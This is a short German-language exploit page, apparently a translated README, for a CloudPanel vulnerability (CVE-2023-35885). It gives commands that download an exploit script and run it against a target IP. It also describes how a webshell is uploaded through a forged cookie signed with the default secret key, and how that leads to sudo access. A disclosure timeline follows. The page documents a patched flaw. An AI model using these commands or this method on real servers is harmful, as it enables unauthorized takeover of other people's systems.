
Cloudpanel 0-Day-Exploit
Cloudpanel 0-day Exploit
Autor: @EagleTube, @Mzulfahmy, @farphalabs
Github : https://github.com/datackmy/FallingSkies-CVE-2023-35885/blob/main/
Betroffene Version: v2.0.0 – v2.3.0
Gepatchte Version: v2.3.1
Website des Anbieters: CloudPanel.io
Produkt: CloudPanel
Referenzen: https://www.datack.my/fallingskies-cloudpanel-0-day/ , [Write Up]
Verwendung :
wget https://raw.githubusercontent.com/datackmy/FallingSkies-CVE-2023-35885/main/exploit2.py
chmod +x exploit2.py
python3 exploit2.py -T target_ip:target_port
Verwende dieses Skript nur zu Bildungszwecken.
Wir übernehmen keine Verantwortung für Schäden oder Missbrauch durch Dritte oder gleichwertiges.
Lade eine Webshell hoch, indem ein verschlüsselter "serialisierter" clp-fm-Cookie mit dem Standard-Geheimschlüssel injiziert wird.

Hochgeladene Shell vom automatisierten Python-Skript.

SSH-Benutzer mit bereits erteilten sudo-Rechten.

CloudPanel v2.3.1
01-06-2023 – Exploit gefunden
12-06-2023 – Privat an Anbieter gemeldet
13-06-2023 – An CVE-Zuweiser eingereicht
19-06-2023 – CVE-Nummer von MITRE zugewiesen
20-06-2023 – Patch vom Anbieter veröffentlicht (v2.3.1)
20-07-2023 – Exploit öffentlich veröffentlicht